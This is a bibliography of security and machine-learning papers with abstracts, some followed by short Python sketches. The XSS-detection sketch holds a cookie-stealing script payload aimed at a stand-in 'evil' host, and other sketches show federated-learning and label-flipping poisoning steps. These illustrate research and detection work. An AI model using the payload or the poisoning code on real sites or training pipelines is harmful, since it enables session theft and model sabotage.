Biblio

Found 111 results

Filters: Keyword is Training data
2020-12-14
Deng, M., Wu, X., Feng, P., Zeng, W.  2020.  Sparse Support Vector Machine for Network Behavior Anomaly Detection. 2020 IEEE 8th International Conference on Information, Communication and Networks (ICICN). :199–204.
Network behavior anomaly detection (NBAD) requires fast mechanisms for learning from large-scale data. However, the training speed of general machine learning approaches is largely limited because they learn weights for all features. We observe that the weight vector over NBAD features is sparse, so there is no need to hold all the weights. Hence, in this paper, we consider an efficient support vector machine (SVM) approach for NBAD that imposes an ℓ1-norm penalty. Essentially, we propose a sparse SVM (S-SVM), in which sparsity in the model, i.e., in the weights, drives feature selection, so that feature selection and classification are achieved jointly and efficiently.
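
To make the core idea concrete, the sketch below fits an ℓ1-penalized linear SVM with scikit-learn's LinearSVC, which drives most feature weights to exactly zero; the synthetic data and parameters are illustrative stand-ins for NBAD features, not the authors' setup.

```python
# Minimal sketch of an l1-regularized linear SVM (sparse SVM); synthetic
# data stands in for NBAD features, not the authors' implementation.
import numpy as np
from sklearn.svm import LinearSVC

rng = np.random.default_rng(0)
X = rng.normal(size=(1000, 50))             # 1000 flows, 50 features
w_true = np.zeros(50)
w_true[:5] = 1.0                            # only 5 features matter
y = (X @ w_true + 0.1 * rng.normal(size=1000) > 0).astype(int)

# penalty="l1" drives most weights to exactly zero, giving joint
# feature selection and classification.
svm = LinearSVC(penalty="l1", dual=False, C=0.1).fit(X, y)
selected = np.flatnonzero(svm.coef_)
print(f"non-zero weights: {selected.size}/50 -> features {selected}")
```
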
Habibi, G., Surantha, N.  2020.  XSS Attack Detection With Machine Learning and n-Gram Methods. 2020 International Conference on Information Management and Technology (ICIMTech). :516–520.

Cross-Site Scripting (XSS) is an attack most often carried out by inserting malicious scripts into a website. The attack takes the user to a webpage that has been specifically designed to steal user sessions and cookies. Nearly 68% of websites are vulnerable to XSS attacks. In this study, the authors evaluated several machine learning methods, namely Support Vector Machine (SVM), K-Nearest Neighbour (KNN), and Naïve Bayes (NB). Each machine learning algorithm is combined with the n-gram method, applied to the script features, to improve the detection performance for XSS attacks. The simulation results show that the combination of SVM and the n-gram method achieves the highest accuracy, at 98%.
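A minimal sketch of the pipeline the paper evaluates, pairing character n-gram features with an SVM; the toy scripts, the n-gram range, and the tokenization are assumptions, since the paper's exact preprocessing is not reproduced here.

```python
# Hedged sketch: character n-gram features + SVM for XSS detection.
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.pipeline import make_pipeline
from sklearn.svm import SVC

scripts = [
    "<script>document.location='http://evil/?c='+document.cookie</script>",
    "<img src=x onerror=alert(1)>",
    "<p>Welcome back, user!</p>",
    "<a href='/profile'>My profile</a>",
]
labels = [1, 1, 0, 0]  # 1 = XSS payload, 0 = benign markup

# analyzer="char" with ngram_range=(1, 3) emits character 1- to 3-grams;
# the n used in the paper is not specified here.
model = make_pipeline(CountVectorizer(analyzer="char", ngram_range=(1, 3)),
                      SVC(kernel="linear"))
model.fit(scripts, labels)
print(model.predict(["<svg onload=alert(document.cookie)>"]))
```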

2020-11-04
Zhang, J., Chen, J., Wu, D., Chen, B., Yu, S.  2019.  Poisoning Attack in Federated Learning using Generative Adversarial Nets. 2019 18th IEEE International Conference On Trust, Security And Privacy In Computing And Communications/13th IEEE International Conference On Big Data Science And Engineering (TrustCom/BigDataSE). :374–380.

Federated learning is a novel distributed learning framework in which the deep learning model is trained collaboratively among thousands of participants. Only model parameters are shared between the server and the participants, which prevents the server from directly accessing the private training data. However, we notice that the federated learning architecture is vulnerable to an active attack from insider participants, called a poisoning attack, where the attacker poses as a benign participant and uploads poisoned updates to the server, thereby degrading the performance of the global model. In this work, we study and evaluate a poisoning attack on a federated learning system based on generative adversarial nets (GAN). That is, an attacker first acts as a benign participant and stealthily trains a GAN to mimic prototypical samples from the other participants' training sets, which do not belong to the attacker. These generated samples, fully controlled by the attacker, are then used to produce poisoning updates, and the global model is compromised by uploading the scaled poisoning updates to the server. In our evaluation, we show that the attacker can successfully generate samples of the other benign participants using the GAN, and the global model achieves more than 80% accuracy on both the poisoning tasks and the main tasks.
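The update-scaling step described in the abstract can be sketched as below; the GAN that produces the mislabeled samples is omitted, the server is assumed to average updates, and all vectors are illustrative stand-ins.

```python
# Sketch of the attacker's update-scaling step only; names and values
# are illustrative, not the authors' setup.
import numpy as np

n_participants = 100
benign_updates = [np.random.normal(0, 0.01, 10)
                  for _ in range(n_participants - 1)]

# Update the attacker derived from training on GAN-generated,
# deliberately mislabeled samples (here just a stand-in vector).
poison_update = np.random.normal(0.5, 0.01, 10)

# Scaling by roughly the number of participants lets one poisoned
# update survive the server's averaging step.
scaled_poison = n_participants * poison_update

global_update = (sum(benign_updates) + scaled_poison) / n_participants
print("poison direction dominates:",
      np.corrcoef(global_update, poison_update)[0, 1])
```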

Liang, Y., He, D., Chen, D.  2019.  Poisoning Attack on Load Forecasting. 2019 IEEE Innovative Smart Grid Technologies - Asia (ISGT Asia). :1230–1235.

Short-term load forecasting systems for power grids have demonstrated high accuracy and have been widely employed for commercial use. However, classic load forecasting systems, which are based on statistical methods, are vulnerable to training data poisoning. In this paper, we demonstrate a data poisoning strategy that effectively corrupts the forecasting model even in the presence of outlier detection. To the best of our knowledge, poisoning attacks on short-term load forecasting with outlier detection have not been studied in previous works. Our method applies to several forecasting models, including the most widely adopted and best-performing ones, such as multiple linear regression (MLR) and neural network (NN) models. Starting with the MLR model, we develop a novel closed-form solution to quickly estimate the new MLR model after a round of data poisoning without retraining. We then employ line search and simulated annealing to find the poisoning attack solution. Furthermore, we use the MLR attack solution to generate a numerical solution for other models, such as the NN. The effectiveness of our algorithm has been tested on the Global Energy Forecasting Competition (GEFCom2012) data set in the presence of outlier detection.
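The abstract's closed-form model re-estimation is in the spirit of the standard Sherman-Morrison rank-one update, sketched below for adding a single poisoned point to a least-squares fit; the paper's exact formula is not reproduced here.

```python
# Re-estimate least-squares weights after adding one poisoned point via
# a Sherman-Morrison rank-one update, avoiding a full retrain.
import numpy as np

rng = np.random.default_rng(1)
X = rng.normal(size=(200, 5))
y = X @ np.array([1.0, -2.0, 0.5, 0.0, 3.0]) + 0.1 * rng.normal(size=200)

A_inv = np.linalg.inv(X.T @ X)          # cached from the clean fit
w = A_inv @ X.T @ y

x_p = rng.normal(size=5)                # poisoned feature vector
y_p = 50.0                              # poisoned target

# Sherman-Morrison:
# (A + x x^T)^{-1} = A^{-1} - (A^{-1} x x^T A^{-1}) / (1 + x^T A^{-1} x)
Ax = A_inv @ x_p
A_inv_new = A_inv - np.outer(Ax, Ax) / (1.0 + x_p @ Ax)
w_new = A_inv_new @ (X.T @ y + x_p * y_p)

# Check against a full refit on the augmented data.
w_ref = np.linalg.lstsq(np.vstack([X, x_p]), np.append(y, y_p), rcond=None)[0]
print(np.allclose(w_new, w_ref))
```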

2020-09-28
Oya, Simon, Troncoso, Carmela, Pérez-González, Fernando.  2019.  Rethinking Location Privacy for Unknown Mobility Behaviors. 2019 IEEE European Symposium on Security and Privacy (EuroS&P). :416–431.
Location Privacy-Preserving Mechanisms (LPPMs) in the literature largely assume that the users' data available for training wholly characterizes their mobility patterns. Thus, they hardwire this information into their designs and evaluate their privacy properties on these same data. In this paper, we aim to understand the impact of this decision on the level of privacy these LPPMs may offer in real life, when the users' mobility data may differ from the data used in the design phase. Our results show that, in many cases, training data does not capture users' behavior accurately and, thus, the level of privacy provided by the LPPM is often overestimated. To address this gap between theory and practice, we propose to use blank-slate models for LPPM design. Contrary to the hardwired approach, which assumes known user behavior, blank-slate models learn the users' behavior from the queries to the service provider. We leverage this blank-slate approach to develop a new family of LPPMs, which we call Profile Estimation-Based LPPMs. Using real data, we empirically show that our proposal outperforms optimal state-of-the-art mechanisms designed on sporadic hardwired models. In non-sporadic location privacy scenarios, our method is better only if the location privacy service is not used continuously. It is our hope that eliminating the need to bootstrap the mechanisms with training data, and ensuring that the mechanisms are lightweight and easy to compute, will help foster the integration of location privacy protections in deployed systems.
2020-09-08
Isnan Imran, Muh. Ikhdar, Putrada, Aji Gautama, Abdurohman, Maman.  2019.  Detection of Near Field Communication (NFC) Relay Attack Anomalies in Electronic Payment Cases using Markov Chain. 2019 Fourth International Conference on Informatics and Computing (ICIC). :1–4.
Near Field Communication (NFC) is a short-range wireless communication technology that supports several features, one of which is electronic payment. NFC works over a limited distance to exchange information. In terms of security, NFC technology leaves a gap that attackers can exploit by forwarding information illegally over the target's NFC link. One example is a relay attack, in which an attacker steals data by exploiting NFC's close-range communication. Relay attacks can cause considerable financial loss, so countermeasures are needed for electronic payments that use NFC technology. Detecting anomalous data is one way to do this: during an attack, several anomalies can be detected and used to prevent it. The Markov chain is one method that can be used to detect relay attacks on electronic payments using NFC. The results show that the Markov chain can detect relay-attack anomalies in the electronic payment case.
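
A minimal sketch of Markov-chain anomaly scoring on transaction event sequences; the states, smoothing, and sequences are assumptions, not the paper's actual feature set.

```python
# Learn a transition matrix from normal NFC transaction sequences, then
# flag sequences whose log-likelihood under the chain is unusually low.
import numpy as np

states = ["tap", "auth", "pay", "ack"]
idx = {s: i for i, s in enumerate(states)}

def transition_matrix(sequences, n, smoothing=1e-3):
    counts = np.full((n, n), smoothing)
    for seq in sequences:
        for a, b in zip(seq, seq[1:]):
            counts[idx[a], idx[b]] += 1
    return counts / counts.sum(axis=1, keepdims=True)

normal = [["tap", "auth", "pay", "ack"]] * 50
P = transition_matrix(normal, len(states))

def log_likelihood(seq):
    return sum(np.log(P[idx[a], idx[b]]) for a, b in zip(seq, seq[1:]))

# A relayed transaction shows an unusual event order and scores far lower.
print(log_likelihood(["tap", "auth", "pay", "ack"]))   # near 0 (likely)
print(log_likelihood(["tap", "pay", "tap", "pay"]))    # strongly negative
```
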
2020-09-04
Jing, Huiyun, Meng, Chengrui, He, Xin, Wei, Wei.  2019.  Black Box Explanation Guided Decision-Based Adversarial Attacks. 2019 IEEE 5th International Conference on Computer and Communications (ICCC). :1592–1596.
Adversarial attacks have become a hot research field in artificial intelligence security. Decision-based black-box adversarial attacks are the most appropriate for real-world scenarios, where only the final decisions of the targeted deep neural network are accessible. However, since there is no guidance available for searching for an imperceptible adversarial perturbation, the boundary attack, one of the best-performing decision-based black-box attacks, carries out a computationally expensive search. To improve attack efficiency, we propose a novel black-box-explanation-guided decision-based black-box adversarial attack. First, the problem of decision-based adversarial attacks is modeled as a derivative-free, constrained optimization problem. To solve this optimization problem, we propose a black-box-explanation-guided constrained random search method that finds an imperceptible adversarial example more quickly. The insights into the targeted deep neural network uncovered by the black-box explanation are fully used to accelerate the computationally expensive random search. Experimental results demonstrate that our proposed attack improves attack efficiency by 64% compared with the boundary attack.
2020-08-10
Kwon, Hyun, Yoon, Hyunsoo, Park, Ki-Woong.  2019.  Selective Poisoning Attack on Deep Neural Network to Induce Fine-Grained Recognition Error. 2019 IEEE Second International Conference on Artificial Intelligence and Knowledge Engineering (AIKE). :136–139.

Deep neural networks (DNNs) provide good performance for image recognition, speech recognition, and pattern recognition. However, poisoning attacks are a serious threat to DNN security. A poisoning attack reduces the accuracy of a DNN by adding malicious training data during the training process. In some situations, such as military applications, it may be desirable to reduce accuracy on only one chosen class in the model. For example, an attacker may want to selectively prevent a UAV from correctly recognizing nuclear-related facilities while leaving its other recognition capabilities intact. In this paper, we propose a selective poisoning attack that reduces the accuracy of only a chosen class in the model. The proposed method trains on malicious training data corresponding to the chosen class, reducing that class's accuracy while maintaining the accuracy of the remaining classes. For the experiments, we used TensorFlow as the machine learning library and MNIST and CIFAR10 as datasets. Experimental results show that the proposed method can reduce the accuracy of the chosen class to 43.2% on MNIST and 55.3% on CIFAR10, while maintaining the accuracy of the remaining classes.
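A toy sketch of the selective idea: inject wrongly labeled samples of one chosen class so that only that class degrades. The victim model, dataset, and poison labels below are illustrative, not the paper's DNN setup.

```python
# Selective poisoning sketch: wrongly-labeled copies of one chosen class
# are appended to the training set so only that class's accuracy drops.
import numpy as np
from sklearn.datasets import load_digits
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split

X, y = load_digits(return_X_y=True)
X_tr, X_te, y_tr, y_te = train_test_split(X, y, random_state=0)

chosen = 3                                   # class the attacker targets
mask = y_tr == chosen
X_poison = X_tr[mask]                        # real images of the chosen class...
y_poison = np.full(mask.sum(), 8)            # ...with a deliberately wrong label

clf = LogisticRegression(max_iter=2000).fit(
    np.vstack([X_tr, X_poison]), np.concatenate([y_tr, y_poison]))

for c in (chosen, (chosen + 1) % 10):
    m = y_te == c
    acc = clf.score(X_te[m], y_te[m])
    print(f"class {c} accuracy: {acc:.2f}")  # chosen class drops, others hold
```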

2020-07-03
Cai, Guang-Wei, Fang, Zhi, Chen, Yue-Feng.  2019.  Estimating the Number of Hidden Nodes of the Single-Hidden-Layer Feedforward Neural Networks. 2019 15th International Conference on Computational Intelligence and Security (CIS). :172–176.

Because there is no effective means of finding the optimal number of hidden nodes in a single-hidden-layer feedforward neural network, this paper introduces a method that solves the problem effectively using singular value decomposition. First, the training data are strictly normalized by attribute-based data normalization and sample-based data normalization. Then, the normalized data are decomposed by singular value decomposition, and the number of hidden nodes is determined from the dominant singular values. Experimental results on the MNIST and APS data sets show that the resulting feedforward neural network attains satisfactory performance on the classification task.
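The SVD step can be sketched as follows; the 95% energy threshold used to count dominant singular values is an assumption, as the paper's exact criterion is not reproduced here.

```python
# Normalize the training matrix, then count dominant singular values.
import numpy as np

rng = np.random.default_rng(2)
X = rng.normal(size=(500, 8)) @ rng.normal(size=(8, 64)) \
    + 0.05 * rng.normal(size=(500, 64))    # approximately rank-8 data

# Attribute-based normalization: zero mean, unit variance per column.
Xn = (X - X.mean(axis=0)) / X.std(axis=0)
# Sample-based normalization: unit l2 norm per row.
Xn = Xn / np.linalg.norm(Xn, axis=1, keepdims=True)

s = np.linalg.svd(Xn, compute_uv=False)
energy = np.cumsum(s**2) / np.sum(s**2)
n_hidden = int(np.searchsorted(energy, 0.95) + 1)   # 95% energy: assumption
print("suggested number of hidden nodes:", n_hidden)
```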

2020-06-22
Adesuyi, Tosin A., Kim, Byeong Man.  2019.  Preserving Privacy in Convolutional Neural Network: An ∊-tuple Differential Privacy Approach. 2019 IEEE 2nd International Conference on Knowledge Innovation and Invention (ICKII). :570–573.
Recent breakthroughs in neural networks have led to convolutional neural networks (CNNs), which have proven very efficient, especially in image recognition and classification. This success is traceable to the availability of large datasets and the CNN's capability to learn salient and complex data features, which subsequently produce a reusable output model (Fθ). The Fθ is often made available (e.g., on the cloud as-a-service) for others (clients) to train on their data or to do transfer learning; however, an adversary can perpetrate a model inversion attack on Fθ to recover training data, compromising the sensitivity of the data used to build the model. This is possible because a CNN, as a variant of deep neural network, memorizes much of its training data during learning. Consequently, this poses a privacy concern, especially when medical or financial data are used to build the model. Existing research that proffers privacy-preserving approaches, however, suffers from significant accuracy degradation, and this has left privacy-preserving models on a theoretical desk. In this paper, we propose an ϵ-tuple differential privacy approach, based on neuron impact factor estimation, that preserves the privacy of a CNN model without significant accuracy degradation. We evaluate our approach on two large datasets, and the results show no significant accuracy degradation.
2020-06-12
Liu, Yujie, Su, Yixin, Ye, Xiaozhou, Qi, Yue.  2019.  Research on Extending Person Re-identification Datasets Based on Generative Adversarial Network. 2019 Chinese Automation Congress (CAC). :3280–3284.

Person re-identification (Person Re-ID) means that images of a pedestrian captured by the cameras of a surveillance camera network can be automatically retrieved based on one image of that pedestrian from another camera. The appearance change of pedestrians under different cameras poses a huge challenge to person re-identification. Person re-identification systems based on deep learning can effectively extract the appearance features of pedestrians. In this paper, a feature enhancement experiment is conducted, and the results show that current person re-identification datasets are relatively small and cannot fully meet the needs of deep training. Therefore, this paper studies a method of using a generative adversarial network to extend person re-identification datasets and proposes a label smoothing regularization for outliers with weight (LSROW) algorithm to make full use of the generated data, effectively improving the accuracy of person re-identification.
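LSROW builds on the LSRO idea of giving GAN-generated images a uniform label distribution. A sketch of that base loss is below; the weighting that distinguishes LSROW, and the 751-class head, are assumptions, not the paper's code.

```python
# LSRO-style loss sketch: real images keep one-hot targets, GAN-generated
# images get a uniform target distribution over all identities.
import torch
import torch.nn.functional as F

def lsro_loss(logits, labels, is_generated):
    """labels: class indices for real images; is_generated: bool mask."""
    log_p = F.log_softmax(logits, dim=1)
    real_loss = F.nll_loss(log_p[~is_generated], labels[~is_generated])
    # Uniform target: -(1/K) * sum_k log p_k for each generated image.
    gen_loss = -log_p[is_generated].mean(dim=1).mean()
    return real_loss + gen_loss

logits = torch.randn(8, 751)              # e.g. 751 identities (assumption)
labels = torch.randint(0, 751, (8,))
is_gen = torch.tensor([0, 0, 0, 0, 1, 1, 1, 1], dtype=torch.bool)
print(lsro_loss(logits, labels, is_gen))
```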

2020-04-03
Song, Liwei, Shokri, Reza, Mittal, Prateek.  2019.  Membership Inference Attacks Against Adversarially Robust Deep Learning Models. 2019 IEEE Security and Privacy Workshops (SPW). :50–56.
In recent years, the research community has increasingly focused on understanding the security and privacy challenges posed by deep learning models. However, the security domain and the privacy domain have typically been considered separately. It is thus unclear whether the defense methods in one domain will have any unexpected impact on the other domain. In this paper, we take a step towards enhancing our understanding of deep learning models when the two domains are combined together. We do this by measuring the success of membership inference attacks against two state-of-the-art adversarial defense methods that mitigate evasion attacks: adversarial training and provable defense. On the one hand, membership inference attacks aim to infer an individual's participation in the target model's training dataset and are known to be correlated with target model's overfitting. On the other hand, adversarial defense methods aim to enhance the robustness of target models by ensuring that model predictions are unchanged for a small area around each sample in the training dataset. Intuitively, adversarial defenses may rely more on the training dataset and be more vulnerable to membership inference attacks. By performing empirical membership inference attacks on both adversarially robust models and corresponding undefended models, we find that the adversarial training method is indeed more susceptible to membership inference attacks, and the privacy leakage is directly correlated with model robustness. We also find that the provable defense approach does not lead to enhanced success of membership inference attacks. However, this is achieved by significantly sacrificing the accuracy of the model on benign data points, indicating that privacy, security, and prediction accuracy are not jointly achieved in these two approaches.
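
A minimal sketch of the confidence-thresholding membership inference commonly used to probe such leakage: guess "member" when the model's top confidence exceeds a threshold. The victim model and threshold are illustrative, not the paper's attack implementation.

```python
# Confidence-threshold membership inference against an overfit model.
import numpy as np
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split

X, y = make_classification(n_samples=400, n_features=20, random_state=0)
X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.5, random_state=0)

model = RandomForestClassifier(n_estimators=50).fit(X_tr, y_tr)  # overfits

def member_guess(X, threshold=0.9):
    # Guess "training member" when top predicted probability is high.
    return model.predict_proba(X).max(axis=1) >= threshold

# Attack accuracy: members should score confident, non-members less so;
# values above 0.5 indicate membership leakage.
acc = 0.5 * (member_guess(X_tr).mean() + (~member_guess(X_te)).mean())
print(f"membership inference accuracy: {acc:.2f}")
```
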
2020-03-02
Nozaki, Yusuke, Yoshikawa, Masaya.  2019.  Countermeasure of Lightweight Physical Unclonable Function Against Side-Channel Attack. 2019 Cybersecurity and Cyberforensics Conference (CCC). :30–34.

In the industrial Internet of Things, various devices are connected to the external Internet. For these connected devices, authentication is very important from a security viewpoint; therefore, physical unclonable functions (PUFs) have attracted attention as an authentication technique. On the other hand, the risk of modeling attacks on PUFs, which mathematically clone the function of a PUF, has been pointed out, and resistant PUFs such as the lightweight PUF have been proposed. However, new analysis methods (side-channel attacks, SCAs), which use side-channel information such as power consumption or electromagnetic emissions, have also been proposed. A countermeasure has been proposed as well, but it has not been evaluated on actual devices. Since PUFs exploit small manufacturing variations, implementation-level evaluation is very important. This study therefore proposes an SCA countermeasure for the lightweight PUF. The proposed method builds on previous studies and keeps power consumption consistent during the generation of the response. In experiments on a field-programmable gate array, the measured power consumption was confirmed to be constant regardless of the PUF's output values. The experimental results further showed that the prediction rate for the response was about 50%, i.e., the proposed method is tamper-resistant against SCAs.

2020-02-26
Wang, Yuze, Han, Tao, Han, Xiaoxia, Liu, Peng.  2019.  Ensemble-Learning-Based Hardware Trojans Detection Method by Detecting the Trigger Nets. 2019 IEEE International Symposium on Circuits and Systems (ISCAS). :1–5.

With the globalization of integrated circuit (IC) design and manufacturing, malicious third-party vendors can easily insert hardware Trojans into their intellectual property (IP) cores during the IC design phase, threatening the security of IC systems. Hardware-Trojan detection methods are therefore strongly needed, especially for the IC design phase. Because trigger nets are a distinctive feature of Trojan circuits, in this paper we propose an ensemble-learning-based hardware-Trojan detection method that detects the trigger nets at the gate level. We extract the trigger-net features for each net from known netlists and use ensemble learning to train two detection models according to the Trojan types. The detection models are used to identify suspicious trigger nets in an unknown netlist under test and output a suspiciousness value for each net. By flagging the top n% of nets of each detection model, ranked by suspiciousness value, as suspicious trigger nets, the proposed method achieves, on average, an 88% true positive rate, a 90% true negative rate, and 90% accuracy.
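The scoring-and-flagging step can be sketched with a generic ensemble model as below; extracting trigger-net features from real netlists is out of scope, so the feature matrix is synthetic and the 5% cutoff is an assumption.

```python
# Score every net of an unknown netlist with an ensemble classifier and
# flag the top n% most suspicious nets.
import numpy as np
from sklearn.ensemble import GradientBoostingClassifier

rng = np.random.default_rng(3)
X_known = rng.normal(size=(2000, 11))          # e.g. 11 trigger-net features
y_known = (X_known[:, 0] + X_known[:, 3] > 2.5).astype(int)  # toy Trojan rule

model = GradientBoostingClassifier().fit(X_known, y_known)

X_new = rng.normal(size=(500, 11))             # nets of an unknown netlist
suspiciousness = model.predict_proba(X_new)[:, 1]

n_pct = 5                                      # flag the top 5% (assumption)
k = max(1, int(len(X_new) * n_pct / 100))
flagged = np.argsort(suspiciousness)[::-1][:k]
print("flagged net indices:", flagged)
```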

2020-02-18
Huang, Yonghong, Verma, Utkarsh, Fralick, Celeste, Infantec-Lopez, Gabriel, Kumar, Brajesh, Woodward, Carl.  2019.  Malware Evasion Attack and Defense. 2019 49th Annual IEEE/IFIP International Conference on Dependable Systems and Networks Workshops (DSN-W). :34–38.

Machine learning (ML) classifiers are vulnerable to adversarial examples. An adversarial example is an input sample that has been slightly modified to induce misclassification in an ML classifier. In this work, we investigate white-box and grey-box evasion attacks against an ML-based malware detector and conduct performance evaluations in a real-world setting. We compare defense approaches for mitigating the attacks, and we propose a framework for deploying grey-box and black-box attacks against malware detection systems.

Nasr, Milad, Shokri, Reza, Houmansadr, Amir.  2019.  Comprehensive Privacy Analysis of Deep Learning: Passive and Active White-Box Inference Attacks against Centralized and Federated Learning. 2019 IEEE Symposium on Security and Privacy (SP). :739–753.

Deep neural networks are susceptible to various inference attacks as they remember information about their training data. We design white-box inference attacks to perform a comprehensive privacy analysis of deep learning models. We measure the privacy leakage through parameters of fully trained models as well as the parameter updates of models during training. We design inference algorithms for both centralized and federated learning, with respect to passive and active inference attackers, and assuming different adversary prior knowledge. We evaluate our novel white-box membership inference attacks against deep learning algorithms to trace their training data records. We show that a straightforward extension of the known black-box attacks to the white-box setting (through analyzing the outputs of activation functions) is ineffective. We therefore design new algorithms tailored to the white-box setting by exploiting the privacy vulnerabilities of the stochastic gradient descent algorithm, which is the algorithm used to train deep neural networks. We investigate the reasons why deep learning models may leak information about their training data. We then show that even well-generalized models are significantly susceptible to white-box membership inference attacks, by analyzing state-of-the-art pre-trained and publicly available models for the CIFAR dataset. We also show how adversarial participants, in the federated learning setting, can successfully run active membership inference attacks against other participants, even when the global model achieves high prediction accuracies.
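One white-box signal in the spirit of the paper's attacks is the per-sample gradient of the loss with respect to the parameters, which tends to be smaller for training members. The sketch below uses logistic regression as a stand-in for a deep model; it is not the authors' attack code.

```python
# Per-sample gradient norm as a white-box membership signal.
import numpy as np
from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split

X, y = make_classification(n_samples=2000, n_features=30, random_state=0)
X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.5, random_state=0)
clf = LogisticRegression(max_iter=1000).fit(X_tr, y_tr)

def grad_norm(x, label):
    """Norm of d(cross-entropy)/d(weights) for one sample."""
    p = clf.predict_proba(x.reshape(1, -1))[0, 1]
    g = (p - label) * x                   # gradient w.r.t. the weight vector
    return np.linalg.norm(g)

members = [grad_norm(x, t) for x, t in zip(X_tr[:200], y_tr[:200])]
non_members = [grad_norm(x, t) for x, t in zip(X_te[:200], y_te[:200])]
print(np.mean(members), np.mean(non_members))  # members typically lower
```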

2019-11-25
Zuin, Gianlucca, Chaimowicz, Luiz, Veloso, Adriano.  2018.  Learning Transferable Features For Open-Domain Question Answering. 2018 International Joint Conference on Neural Networks (IJCNN). :1–8.

Corpora used to learn open-domain Question-Answering (QA) models are typically collected from a wide variety of topics or domains. Since QA requires understanding natural language, open-domain QA models generally need very large training corpora. A simple way to alleviate data demand is to restrict the domain covered by the QA model, leading thus to domain-specific QA models. While learning improved QA models for a specific domain is still challenging due to the lack of sufficient training data in the topic of interest, additional training data can be obtained from related topic domains. Thus, instead of learning a single open-domain QA model, we investigate domain adaptation approaches in order to create multiple improved domain-specific QA models. We demonstrate that this can be achieved by stratifying the source dataset, without the need of searching for complementary data unlike many other domain adaptation approaches. We propose a deep architecture that jointly exploits convolutional and recurrent networks for learning domain-specific features while transferring domain-shared features. That is, we use transferable features to enable model adaptation from multiple source domains. We consider different transference approaches designed to learn span-level and sentence-level QA models. We found that domain-adaptation greatly improves sentence-level QA performance, and span-level QA benefits from sentence information. Finally, we also show that a simple clustering algorithm may be employed when the topic domains are unknown and the resulting loss in accuracy is negligible.

2019-05-01
Li, P., Liu, Q., Zhao, W., Wang, D., Wang, S.  2018.  Chronic Poisoning against Machine Learning Based IDSs Using Edge Pattern Detection. 2018 IEEE International Conference on Communications (ICC). :1–7.

In the big data era, machine learning is one of the fundamental techniques in intrusion detection systems (IDSs). A poisoning attack, one of the most recognized security threats to machine learning-based IDSs, injects adversarial samples into the training phase, inducing drift in the training data and a significant performance decrease of the target IDS on testing data. In this paper, we adopt the Edge Pattern Detection (EPD) algorithm to design a novel poisoning method that attacks several machine learning algorithms used in IDSs. Specifically, we propose a boundary pattern detection algorithm that efficiently generates points that are near the abnormal data but are considered normal by current classifiers. Then, we introduce a Batch-EPD Boundary Pattern (BEBP) detection algorithm to overcome the limit on the number of edge pattern points generated by EPD and to obtain more useful adversarial samples. Based on BEBP, we further present a moderate but effective poisoning method called the chronic poisoning attack. Extensive experiments on synthetic and three real network data sets demonstrate the performance of the proposed poisoning method against several well-known machine learning algorithms and a practical intrusion detection method named FMIFS-LSSVM-IDS.

2019-03-22
Duan, J., Zeng, Z., Oprea, A., Vasudevan, S.  2018.  Automated Generation and Selection of Interpretable Features for Enterprise Security. 2018 IEEE International Conference on Big Data (Big Data). :1258–1265.

We present an effective machine learning method for malicious activity detection in enterprise security logs. Our method involves feature engineering, or generating new features by applying operators on features of the raw data. We generate DNF formulas from raw features, extract Boolean functions from them, and leverage Fourier analysis to generate new parity features and rank them based on their highest Fourier coefficients. We demonstrate on real enterprise data sets that the engineered features enhance the performance of a wide range of classifiers and clustering algorithms. As compared to classification of raw data features, the engineered features achieve up to 50.6% improvement in malicious recall, while sacrificing no more than 0.47% in accuracy. We also observe better isolation of malicious clusters, when performing clustering on engineered features. In general, a small number of engineered features achieve higher performance than raw data features according to our metrics of interest. Our feature engineering method also retains interpretability, an important consideration in cyber security applications.
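The parity-feature construction can be sketched directly: map Boolean features and labels to ±1, form parity (XOR) combinations, and rank them by the magnitude of the empirical Fourier coefficient E[f(x)·χ_S(x)]. The DNF-extraction stage is not reproduced here; the hidden rule below is illustrative.

```python
# Rank parity features of Boolean raw features by empirical Fourier
# coefficients; the planted rule XOR(1, 4, 6) should surface on top.
import numpy as np
from itertools import combinations

rng = np.random.default_rng(4)
X = rng.integers(0, 2, size=(1000, 8))          # 8 Boolean raw features
y = X[:, 1] ^ X[:, 4] ^ X[:, 6]                 # hidden parity rule

Xpm = 1 - 2 * X                                 # {0,1} -> {+1,-1}
ypm = 1 - 2 * y

scores = {}
for r in (2, 3):
    for S in combinations(range(8), r):
        chi_S = Xpm[:, list(S)].prod(axis=1)    # parity feature chi_S(x)
        scores[S] = abs(np.mean(ypm * chi_S))   # empirical Fourier coefficient

top = sorted(scores, key=scores.get, reverse=True)[:3]
print([(S, round(scores[S], 2)) for S in top])  # (1, 4, 6) ranks first
```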

2018-06-07
Lodeiro-Santiago, Moisés, Caballero-Gil, Cándido, Caballero-Gil, Pino.  2017.  Collaborative SQL-injections Detection System with Machine Learning. Proceedings of the 1st International Conference on Internet of Things and Machine Learning. :45:1–45:5.
Data mining and information extraction from data is a field that has gained relevance in recent years thanks to techniques based on artificial intelligence and the use of machine and deep learning. The main aim of the present work is the development of a tool, based on a prior behaviour study of security audit tools (oriented to SQL pentesting), for creating test sets capable of accurately detecting SQL attacks. The study is based on information collected from the web server logs generated in a pentesting laboratory environment. Then, using the common patterns extracted from the logs, each attack vector is classified into risk levels (dangerous attack, normal attack, non-attack, etc.). Finally, training on the generated data was performed to obtain a classifier system whose performance ranges between 97 and 99 percent in positive attack detection. The training data is shared with other servers to create a distributed network capable of deciding whether a query is an attack or a legitimate request, and of informing connected clients so that requests from the attacker's IP can be blocked.
2018-05-01
Tran, D. T., Waris, M. A., Gabbouj, M., Iosifidis, A.  2017.  Sample-Based Regularization for Support Vector Machine Classification. 2017 Seventh International Conference on Image Processing Theory, Tools and Applications (IPTA). :1–6.

In this paper, we propose a new regularization scheme for the well-known Support Vector Machine (SVM) classifier that operates at the training-sample level. The proposed approach is motivated by the fact that maximum-margin classification defines decision functions as a linear combination of the selected training data, so variations in training sample selection directly affect generalization performance. We show that the proposed regularization scheme is well motivated and intuitive. Experimental results show that it outperforms the standard SVM in human action recognition tasks as well as classical recognition problems.

Kong, L., Huang, G., Wu, K.  2017.  Identification of Abnormal Network Traffic Using Support Vector Machine. 2017 18th International Conference on Parallel and Distributed Computing, Applications and Technologies (PDCAT). :288–292.

